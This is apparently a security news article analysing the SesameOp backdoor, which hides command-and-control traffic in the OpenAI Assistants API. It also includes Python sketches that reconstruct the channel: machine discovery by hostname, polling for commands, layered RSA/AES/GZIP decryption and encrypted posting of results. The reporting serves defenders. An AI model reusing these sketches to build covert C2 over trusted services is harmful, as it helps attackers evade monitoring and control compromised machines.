A sophisticated new backdoor named SesameOp has emerged with a novel approach to command-and-control communications that fundamentally challenges conventional security assumptions.
Discovered in July 2025 by Microsoft's Incident Response Detection and Response Team (DART), the malware represents a significant shift in how threat actors exploit legitimate cloud services for covert operations.
Rather than relying on dedicated infrastructure or suspicious network connections, SesameOp abuses the OpenAI Assistants API as a disguised command relay, allowing attackers to issue instructions and receive results through what appears to be legitimate traffic to a trusted service.
The malware was discovered during a complex incident investigation in which attackers had maintained an operational presence inside a compromised environment for months.
The investigation revealed an intricate architecture of internal web shells strategically positioned throughout the network.
These shells operated under the control of persistent malicious processes that leveraged compromised Microsoft Visual Studio utilities via .NET AppDomainManager injection, a technique that evades traditional detection mechanisms by hiding malicious code inside legitimate system processes.
Microsoft analysts identified the infection chain as a two-component system. The first component is Netapi64.dll, a heavily obfuscated loader designed to locate and execute the primary backdoor.
Netapi64.dll enumerates files in the Temp directory (Source: Microsoft)
The second component, OpenAIAgent.Netapi64, contains the core functionality that orchestrates C2 communications through the OpenAI platform.
Rather than using OpenAI's agent software development kits or model-execution features, the backdoor weaponizes the Assistants API purely as a message storage mechanism.
Commands arrive compressed and encrypted; the malware decrypts and executes them locally before returning the results through the same OpenAI infrastructure.
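The dead-drop pattern is easy to picture: nothing in the Assistants API constrains what a thread message contains, so an encrypted blob travels like any other string. The sketch below uses OpenAI's publicly documented REST endpoints; the API key and payload are placeholders, not values recovered from the malware.

```python
# Illustrative sketch only: the Assistants API used as a generic message
# store. Endpoint paths come from OpenAI's public REST documentation.
import requests

API = "https://api.openai.com/v1"
HEADERS = {
    "Authorization": "Bearer <API_KEY>",   # the real malware carries a hardcoded key
    "OpenAI-Beta": "assistants=v2",        # header required by the Assistants endpoints
}

# A thread is just a container, and a message is just a string field, so an
# encrypted, encoded command blob passes through like any other message body.
thread = requests.post(f"{API}/threads", headers=HEADERS, json={}).json()
requests.post(
    f"{API}/threads/{thread['id']}/messages",
    headers=HEADERS,
    json={"role": "user", "content": "<base64-encoded, encrypted command blob>"},
)
```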
Communication and Execution Mechanisms
The technical sophistication underlying SesameOp extends beyond simple API misuse. Upon execution, the backdoor initiates command retrieval by first establishing contact with OpenAI's vector store infrastructure.
The malware encodes the infected machine's hostname in Base64 and queries the Assistants API to identify the corresponding vector stores and assistants previously created by the operator.
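A minimal sketch of that discovery step, assuming the Base64 hostname tag is matched against the assistant's name field (Microsoft's write-up does not specify which field carries it):

```python
# Hedged sketch of the discovery step: encode the hostname, list the
# account's assistants, and find the entry tied to this machine.
import base64
import socket
import requests

API = "https://api.openai.com/v1"
HEADERS = {"Authorization": "Bearer <API_KEY>", "OpenAI-Beta": "assistants=v2"}

# Base64-encoded hostname serves as this machine's identifier.
host_tag = base64.b64encode(socket.gethostname().encode()).decode()

# GET /v1/assistants returns the account's assistants; scan for a match.
assistants = requests.get(f"{API}/assistants", headers=HEADERS).json()["data"]
mine = [a for a in assistants if a.get("name") == host_tag]
```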
The configuration embedded within the backdoor contains a hardcoded OpenAI API key, a dictionary key selector, and optional proxy information.
Once communication is established, the malware enters a polling loop in which it periodically checks for new commands marked with either "SLEEP" or "Payload" designations within the assistant descriptions.
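In outline, the loop looks something like the following sketch; the polling interval and the exact placement of the SLEEP/Payload markers inside the description string are assumptions made for illustration.

```python
# Hedged reconstruction of the polling loop. Interval, marker parsing,
# and field names are illustrative assumptions, not recovered code.
import time
import requests

API = "https://api.openai.com/v1"
HEADERS = {"Authorization": "Bearer <API_KEY>", "OpenAI-Beta": "assistants=v2"}

def poll_for_command(host_tag: str, interval: int = 60) -> dict:
    while True:
        assistants = requests.get(f"{API}/assistants", headers=HEADERS).json()["data"]
        for a in assistants:
            if a.get("name") != host_tag:
                continue                     # not this machine's dead drop
            desc = a.get("description") or ""
            if desc.startswith("Payload"):
                return a                     # hand off to retrieval and decryption
            # "SLEEP" (or no marker) means stay dormant until the next poll
        time.sleep(interval)
```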
When a payload command appears, the backdoor retrieves the encrypted content from OpenAI threads using thread IDs and message identifiers.
The payload undergoes multi-layered decryption: first, a 32-byte AES key is extracted and decrypted using an embedded RSA private key; the command payload is then decrypted with this AES key and decompressed using GZIP.
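The unwrap-then-decrypt sequence can be sketched with Python's `cryptography` package. The RSA padding (OAEP) and AES mode (CBC with a prefixed IV) are assumptions here; the report names the algorithms but not these parameters.

```python
# Sketch of the layered decryption: RSA-unwrap a 32-byte AES key,
# AES-decrypt the payload, then GZIP-decompress the result.
import gzip
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def unwrap_and_decrypt(blob: bytes, wrapped_key: bytes, rsa_pem: bytes) -> bytes:
    private_key = serialization.load_pem_private_key(rsa_pem, password=None)
    aes_key = private_key.decrypt(          # recover the 32-byte AES key
        wrapped_key,
        padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                     algorithm=hashes.SHA256(), label=None),
    )
    iv, ciphertext = blob[:16], blob[16:]   # assumed IV-prefixed layout
    decryptor = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    plaintext = padded[: -padded[-1]]       # strip PKCS#7 padding
    return gzip.decompress(plaintext)       # final GZIP layer
```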
The decrypted message is transformed into a dictionary structure that the backdoor passes to a dynamically loaded .NET module via the JScript evaluation engine.
This module executes the command and produces results that are compressed, encrypted with a randomly generated AES key, and posted back to OpenAI as a new message.
The backdoor then creates a new Assistant record with the execution results marked as "Result," signaling to the operator that the tasks have completed.
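The return path mirrors the inbound one. A sketch under stated assumptions: how the one-time AES key is conveyed back to the operator is not described in the report and is omitted here, and the use of the description field as the "Result" signal is an inference from the marker scheme above.

```python
# Return-path sketch: GZIP-compress the output, encrypt it with a fresh
# AES key, post it as a thread message, and flag completion. Field
# placement and the key-transport step are assumptions for illustration.
import base64
import gzip
import os
import requests
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

API = "https://api.openai.com/v1"
HEADERS = {"Authorization": "Bearer <API_KEY>", "OpenAI-Beta": "assistants=v2"}

def post_result(thread_id: str, assistant_id: str, output: bytes) -> None:
    aes_key, iv = os.urandom(32), os.urandom(16)    # one-time key per result
    data = gzip.compress(output)
    pad = 16 - len(data) % 16                       # PKCS#7 padding
    data += bytes([pad] * pad)
    encryptor = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).encryptor()
    blob = base64.b64encode(iv + encryptor.update(data) + encryptor.finalize()).decode()

    # Results travel as an ordinary message in the operator's thread...
    requests.post(f"{API}/threads/{thread_id}/messages", headers=HEADERS,
                  json={"role": "user", "content": blob})
    # ...and the assistant record is updated with the "Result" marker.
    requests.post(f"{API}/assistants/{assistant_id}", headers=HEADERS,
                  json={"description": "Result"})
```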
This bidirectional communication channel remains virtually invisible to network monitoring tools, since all traffic appears as routine connections to a legitimate, trusted service.
The OpenAI Assistants API has been deprecated by the platform and will be retired in August 2026.
Microsoft and OpenAI jointly investigated this threat, leading OpenAI to identify and disable the API key and associated account used by the threat actor.
Nevertheless, the case underscores a critical weakness in how emerging technologies can be weaponized before security communities fully understand their implications.
